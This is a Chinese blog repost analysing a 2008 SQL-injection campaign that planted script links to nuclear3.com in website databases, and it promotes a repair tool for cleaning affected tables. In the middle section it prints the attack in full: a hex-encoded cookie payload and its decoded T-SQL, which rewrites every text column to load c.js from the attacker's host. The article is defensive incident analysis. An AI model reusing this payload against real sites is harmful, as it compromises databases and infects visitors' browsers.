数据库挂马修复工具及nuclear3.com挂马分析

最新推荐文章于 2024-08-21 07:52:57 发布
最新推荐文章于 2024-08-21 07:52:57 发布
阅读量64 收藏
点赞数
文章标签: 数据库 运维
原文链接:http://www.cnblogs.com/cnhefang/archive/2008/12/19/1358644.html
版权

一不小心数据库被挂了码,又没有及时做备份,只要一个一个表的恢复,现在加功能整理到这个小软件里,希望能方便大家。

nuclear3.com挂马分析

通常的防注入程序只对 request.form 和 request.querystring 做了检查过滤,

当代码中存在request("userid")时,request自动一次访问form querystring cookies,

这个时候黑客通过伪造的cookies绕过通常的过滤执行了挂马。

通过cookies提交的内容如下

 

  221.130.*.*  2008-12-19 3:29:26  /s*_*.asp  Cookie  id 

ContractedBlock.gif ExpandedBlockStart.gif Code
76435;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0053006300720069007000740020005300720063003D0068007400740070003A002F002F002500360033002500320045006E00750063006C0065006100720033002E0063006F006D002F006300730073002F0063002E006A0073003E003C002F005300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);-- exec

通过cast函数转后的语句为

CaSt

ContractedBlock.gif ExpandedBlockStart.gif Code
Declare @T Varchar(255),@C Varchar(255Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

其中<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>不断变化,甚至多次被注入,无法通过简单的替换一次清理干净。

最好通过正则表达式替换。

 

 

数据库挂马修复工具

说明:
1将数据库备份在本地的还原进行修复
*注意一定做好备份工作
*本地修复性能较好
*没有多台机器,建议使用虚拟机vmware
2此程序运行需要dotnet framework 2.0
支持 sql2000 sql2005
3设置数据库连接,需要使用sa用户,修复过程中使用正则表达,需要管理员权限。
4  ntext数据类型的字符串不能再直接替换,请选择ntext修复,通过设置陪需分段修复,建议之小于5000
分批处理每次不超过1000

5 普通修中注意主键字段的填写,一般为int类型。
6 普通修复暂时没有没有分段修复功能,数据最好不要超过10W

发布记录
v0.12 内部邀请测试,细节有待改善,性能有待改进


联系我:cnhefang@gmail.com

错误信息最好截图

 

下载地址:

http://files.cnblogs.com/cnhefang/sqlfixer.rar

 

 

转载须指明出处

转载于:https://www.cnblogs.com/cnhefang/archive/2008/12/19/1358644.html

weixin_30294709
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021.05.11丨COG分析柱状图绘制
05-11 4808
目录摘要环境与方法文档准备分类简称及描述比对结果使用代码结果展示总结 摘要 在RNA-seq项目中,需要将差异基因比对到各个数据库当中,生成相应的注释结果和图像,便于深度挖掘信息。COG(Cluster of Orthologous Groups ofproteins 同源蛋白簇)数据库可以帮助了解蛋白功能甚至进化关系(细/真菌)。此次记录一下COG分类图的绘制方法 环境与方法 R version 3.6.1 (2019-07-05) 文档准备 分类简称及描述 # Code Name
核电站运营和维修服务市场现状研究分析-
GEMMAKO的博客
03-12 411
辰宇信息咨询市场调研公司最近发布-《2022-2028中国核电站运营和维修服务市场现状研究分析与发展前景预测报告》 内容摘要 本文研究中国市场核电站运营和维修服务现状及未来发展趋势,侧重分析在中国市场扮演重要角色的企业,重点呈现这些企业在中国市场的核电站运营和维修服务收入、市场份额、市场定位、发展计划、产品及服务等。历史数据为2017至2021年,预测数据为2022至2028年。 2021年中国核电站运营和维修服务市场销售收入达到了 万元,预计2028年可以达到 万元,2022-2028期间年复.
一个网站挂马检测工具
10-19
一个小巧的工具,用来检查网站文件或者网络文件是否被添加了危险代码。
PHP_CLI版数据库挂马检查工具1.0(开源发布)
CyberH4CK的专栏
12-30 737
 用到一点正则表达式(不够完善,既然是开源,大家就拿去完善吧),本人开发环境 winXP+apache2.0.63+php5.2.5  (理论上也是可以在linux下运行的,不过先得把环境安装好,这个不用多说.)能检测 MYSQL 数据库挂马语句 ,包括 JS挂马 ,CSS挂马 ,iframe 挂马等 ,同时也能检查 php ,asp(记性不大好,asp好像
java 红外光谱数据库_免费的谱图数据库20个 - 晶体 - 小木虫 - 学术 科研 互动社区...
weixin_28842367的博客
02-25 2175
【名称】ChemExper化学品目录CDD (包括MSDS、5000张红外谱图)【资源简介】The database contains currently more than 70 000 chemicals, 16000 MSDS, 5000 IR spectra and more than 20 suppliers. It is the only chemical database that ...
c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案
weixin_30443731的博客
12-16 61
最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js></Script>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵,约有498,000项,上万个网站被挂马。 木马地址不断变形<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Scr...
数据库复习2. Relational Algebra 关系代数
weixin_45161329的博客
06-28 1547
Relational Algebra 关系代数 Relational Algebra is the language to describe operations in relational DBMS helps understanding of Query execution,and particularly Query optimisation. 关系代数是描述关系DBMS中操作的语言,有助于理解查询执行,特别是查询优化。 It is basic set of relational operat
猿创征文 | 国产数据库之南大通用数据库详解安装和使用
LQ的博客
10-13 6946
南大通用数据库详解安装和使用
快堆燃耗数据库的开发与初步应用分析.doc
11-21
"快堆燃耗数据库的开发与初步应用分析" 快堆燃耗数据库是核工业中一个重要的核心技术,plays a crucial role in nuclear industry。该数据库的开发和应用可以提高核工业的经济效益,提高核反应堆的设计和运营效率。...
数据库中的内容字段被挂马的替换方法 SQL注入
09-11
在本场景中,数据库的内容字段被“挂马”,即黑客通过SQL注入的方式,在数据库记录中植入了恶意脚本,通常是JavaScript代码,用于执行不正当的操作,比如窃取用户信息或传播恶意软件。 处理这种情况的关键步骤如下...
批量替换sqlserver数据库挂马字段并防范sql注入攻击的代码
09-11
### 批量替换SQL Server数据库挂马字段并防范SQL注入攻击 #### 一、背景介绍 在日常的网站运营过程中,数据库的安全性至关重要。当网站的SQL Server数据库遭受恶意挂马时,会对用户数据造成严重威胁,同时也可能...
An efficient tensor completion method via truncated nuclear norm.pdf
06-27
在图像处理、信号处理、计算机视觉等领域,由于各种原因(例如,数据采集设备的损坏或限制、数据存储及传输过程中的丢失),经常出现数据缺失的情况。为了恢复原始的多维数据结构,必须对缺失的数据进行合理的估计和...
java 红外光谱数据库_【分享】免费的20个谱图数据库 - 晶体 - 小木虫 - 学术 科研 互动社区...
weixin_39979215的博客
02-13 1898
免费的谱图数据库20个★ ★ ★ ★ ★【名称】ChemExper化学品目录CDD (包括MSDS、5000张红外谱图)【资源简介】The database contains currently more than 70 000 chemicals, 16000 MSDS, 5000 IR spectra and more than 20 suppliers. It is the only che...
【生物信息学学习】第一天:生物数据库使用
weixin_45685859的博客
09-08 2993
PubMed是拥有超过两百四十万的生物医学文献。它们来源于MEDLINE(生物医学文献数据库)、生命科学领域数据杂志以及在线的专业书籍。PubMed链接:在PubMed中进行搜索:关于PubMed搜索的相关内容,通过WoS的知识进行理解。(后续会更新WoS搜索相关文章)
【达梦数据库】导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 333
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
redis常用操作命令
最新发布
diffiii
08-21 203
显示服务器时间 , 时间戳(秒), 微秒数。模糊查询以fine为前缀的key值。模糊查询以ha为后缀的key值。删除指定key,多个用空格隔开。当前数据库key的数量。登录redis客户端。退出redis客户端。
分布式事务:基本概念
玉汝于成
08-20 300
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
"INSPEC数据库:信息检索与利用简介
核工程 (Nuclear Engineering)•天文地理学 (Geophysics and Astrophysics)•生物医学工程 (Biomedical Engineering)•生物物理学 (Biophysics)Inspec 数据库具有以下检索特点:精准、快速、全面、高效、易用、定制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值